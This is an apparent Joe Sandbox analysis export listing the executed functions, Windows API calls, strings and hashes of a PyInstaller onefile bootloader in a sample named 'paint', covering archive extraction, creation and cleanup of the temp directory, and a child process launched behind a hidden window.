Executed Functions

Function 00007FF6F0BD8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8C46

Part of subcall function 00007FF6F0BEA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BEA500

Part of subcall function 00007FF6F0BE878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8CD6
CreateProcessW.KERNELBASE ref: 00007FF6F0BD8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8D18

Part of subcall function 00007FF6F0BD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
Part of subcall function 00007FF6F0BD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
Part of subcall function 00007FF6F0BD2C50: MessageBoxW.USER32 ref: 00007FF6F0BD2D99

RegisterClassW.USER32 ref: 00007FF6F0BD8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8D7B
CreateWindowExW.USER32 ref: 00007FF6F0BD8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E05
PeekMessageW.USER32 ref: 00007FF6F0BD8E29
TranslateMessage.USER32 ref: 00007FF6F0BD8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E41
PeekMessageW.USER32 ref: 00007FF6F0BD8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD8FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF6F0BD9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6F0BD3F7F), ref: 00007FF6F0BD901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF6F0BD8D44
Failed to create child process!, xrefs: 00007FF6F0BD8D20
CreateProcessW, xrefs: 00007FF6F0BD8D27
PyInstaller Onefile Hidden Window, xrefs: 00007FF6F0BD8D85

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: a22e0a3c8163d40ef9c95ded053830d06f46bc37fcf410426d6ab20a6e838ce3
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: A0D1C232A09A82E6EB108F74E8506A97765FF86B59F800235DA6E837E4EF3DD104C700

Function 00007FF6F0BD1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6F0BD3A17, 00007FF6F0BD3A2F, 00007FF6F0BD3A9B
Failed to start splash screen!, xrefs: 00007FF6F0BD3ED4
Py_GIL_DISABLED, xrefs: 00007FF6F0BD3AF4
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6F0BD3EA6
VCRUNTIME140.dll, xrefs: 00007FF6F0BD3DB1
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6F0BD3971
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6F0BD3B32
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6F0BD3D35
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6F0BD3A0B, 00007FF6F0BD3CD4, 00007FF6F0BD3F6B
pkg, xrefs: 00007FF6F0BD39BE
Could not create temporary directory!, xrefs: 00007FF6F0BD3CBF
pyi-python-flag, xrefs: 00007FF6F0BD3AD6
_PYI_SPLASH_IPC, xrefs: 00007FF6F0BD3A23, 00007FF6F0BD3EF5
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6F0BD3E0A
pyi-disable-windowed-traceback, xrefs: 00007FF6F0BD3BB2
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6F0BD3882, 00007FF6F0BD38AF
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6F0BD39DE
Failed to remove temporary directory: %s, xrefs: 00007FF6F0BD3FC3
Failed to load splash screen resources!, xrefs: 00007FF6F0BD3E85
MEI, xrefs: 00007FF6F0BD3933
_PYI_ARCHIVE_FILE, xrefs: 00007FF6F0BD38D2, 00007FF6F0BD39FF
Failed to convert DLL search path!, xrefs: 00007FF6F0BD3DDC
pyi-runtime-tmpdir, xrefs: 00007FF6F0BD3B68
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6F0BD3EBB
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6F0BD3BE8
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6F0BD3D12
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6F0BD3C61
pyi-contents-directory, xrefs: 00007FF6F0BD3B8D

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
Instruction ID: b7b4922780083decd8472ad9f1faaa48d88e0f93a3ca88e2fd82dc7981fd91c0
Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
Instruction Fuzzy Hash: AA326E25A0E682B1EB259B2496543B9E752AF56B80FC44032DA6FC33D7FF2EE555C300

Function 00007FF6F0BF69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F0BF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF6749
Part of subcall function 00007FF6F0BF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF67C7
Part of subcall function 00007FF6F0BF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BF6818

CreateFileW.KERNELBASE ref: 00007FF6F0BF6ADA
CreateFileW.KERNEL32 ref: 00007FF6F0BF6B2A
GetLastError.KERNEL32 ref: 00007FF6F0BF6B5A
GetFileType.KERNELBASE ref: 00007FF6F0BF6B6F
GetLastError.KERNEL32 ref: 00007FF6F0BF6B79
CloseHandle.KERNEL32 ref: 00007FF6F0BF6BAC
CloseHandle.KERNEL32 ref: 00007FF6F0BF6D0F
CreateFileW.KERNEL32 ref: 00007FF6F0BF6D44
GetLastError.KERNEL32 ref: 00007FF6F0BF6D53

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: 38828b328dd74633a06efc509083ae11ea937120d790e1ddf9eecf71d5b71c3f
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: CFC1E13AB28A4295EB10CFA4C4916AC3769FB4AB98B415235DE2FD77D5EF3AD411C300

Function 00007FF6F0BD83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD841B
RemoveDirectoryW.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD849E
DeleteFileW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84BD
FindNextFileW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84CB
FindClose.KERNEL32(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84DC
RemoveDirectoryW.KERNELBASE(?,00007FF6F0BD8B09,00007FF6F0BD3FA5), ref: 00007FF6F0BD84E5

Strings

%s\*, xrefs: 00007FF6F0BD83E2

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 9a8a52e998d158609c3b3ae7c450f573cf65c3b4f330eb4458d2075b307f4148
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: BC41C225A0E943A0EB209B60E4545B9A365FF96B55FC00232D56FC37C4FF3EE5068B00

Function 00007FF6F0BD92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6F0BD9323
FindClose.KERNELBASE ref: 00007FF6F0BD9332

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: fbfd0f38adec2e3a5c335ca5765c14d5955c3f924ee9959431f62da887e86d82
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: D4F0C866A19742C6F7A08BA0B459766B351AB89338F840335DA7E427D4EF3CD049CB00

Function 00007FF6F0BF0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
Instruction ID: f7834b25f92ca8bf010d167672afe9b3cbf177e30ceb5b71c48e1d7453fee545
Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
Instruction Fuzzy Hash: D002A129E2D64360FB65AB9598002796698AF47B91FC58634DD7FC73E2FE7EB4018300

Function 00007FF6F0BD1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6F0BD7F80: _fread_nolock.LIBCMT ref: 00007FF6F0BD802A

_fread_nolock.LIBCMT ref: 00007FF6F0BD1A1B

Part of subcall function 00007FF6F0BD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E

Strings

MEI, xrefs: 00007FF6F0BD1991
Failed to seek to cookie position!, xrefs: 00007FF6F0BD19EE
Failed to read cookie!, xrefs: 00007FF6F0BD1A2B
Error on file., xrefs: 00007FF6F0BD1B8D
Could not allocate buffer for TOC!, xrefs: 00007FF6F0BD1B1B
Could not allocate memory for archive structure!, xrefs: 00007FF6F0BD1A61
calloc, xrefs: 00007FF6F0BD1A68
malloc, xrefs: 00007FF6F0BD1B22
Could not read full TOC!, xrefs: 00007FF6F0BD1B55
fseek, xrefs: 00007FF6F0BD19F5
fread, xrefs: 00007FF6F0BD1A32, 00007FF6F0BD1B5C

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
Instruction ID: e528fdf8846a88169fbcff59631d6b632cad717047f6798f0291ed39d8d2b1f2
Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
Instruction Fuzzy Hash: AE819171A1D683B5EB20DB24D0406B963A2EF46784F844431E9AFC77C5FE3EE5858740

Function 00007FF6F0BD1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to open archive file!, xrefs: 00007FF6F0BD16A2
Failed to create symbolic link %s!, xrefs: 00007FF6F0BD1622
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6F0BD17CA
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6F0BD1742
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6F0BD16DA
Failed to extract %s: failed to open target file!, xrefs: 00007FF6F0BD165C
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6F0BD17DF
fwrite, xrefs: 00007FF6F0BD17D1
fopen, xrefs: 00007FF6F0BD1663
malloc, xrefs: 00007FF6F0BD1749
fseek, xrefs: 00007FF6F0BD16E1
fread, xrefs: 00007FF6F0BD17E6

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: c74b183492ef537dc1c41b7527725f75c115d49e855bc25f8c1e55d00cf8c8f1
Instruction ID: b509cb3fbae2eb6ed8520ac792fd666c2ea22f8505926139e2675406166c16cf
Opcode Fuzzy Hash: c74b183492ef537dc1c41b7527725f75c115d49e855bc25f8c1e55d00cf8c8f1
Instruction Fuzzy Hash: 6E51C165F0A643B2EB10AB6194005B9A366BF82B94FC44531EE2E877D6FF3EE5458340

Function 00007FF6F0BD8850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD893C

Part of subcall function 00007FF6F0BD8A20: GetEnvironmentVariableW.KERNEL32(00007FF6F0BD388E), ref: 00007FF6F0BD8A57
Part of subcall function 00007FF6F0BD8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6F0BD8A79

Part of subcall function 00007FF6F0BE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE82C1

Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA

Strings

LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6F0BD896E
_MEI%d, xrefs: 00007FF6F0BD8902
LOADER: failed to set the TMP environment variable., xrefs: 00007FF6F0BD88CC
TMP, xrefs: 00007FF6F0BD88B2
TMP, xrefs: 00007FF6F0BD888C, 00007FF6F0BD8993

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction ID: e0653768494b0e64a5ac929e36bcf9a97ad7fbaa9d53d81d11b97cf1b5545436
Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
Instruction Fuzzy Hash: 5541A311A1A64370FB20AB61A8652B95392AF87BC5FC01131ED2FC77D6FE3EE5059340

Function 00007FF6F0BD1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6F0BD12BA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6F0BD12EF
1.3.1, xrefs: 00007FF6F0BD1249
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6F0BD141E
malloc, xrefs: 00007FF6F0BD12C1, 00007FF6F0BD12F6
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6F0BD1276

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
Instruction ID: 6dd0c5d2f4590058812d6be86454b319aa5443a4d6a3686f20d72fa56823c257
Opcode Fuzzy Hash: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
Instruction Fuzzy Hash: A251C322A09683B1E760AB51A4003BAA292BF86794FC44535ED6FC77C5FF3EE545CB00

Function 00007FF6F0BEED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,-00000018,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEEFC
GetProcAddress.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,-00000018,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEF08

Strings

api-ms-, xrefs: 00007FF6F0BEEE46
ext-ms-, xrefs: 00007FF6F0BEEE59

Memory Dump Source

Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true

Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
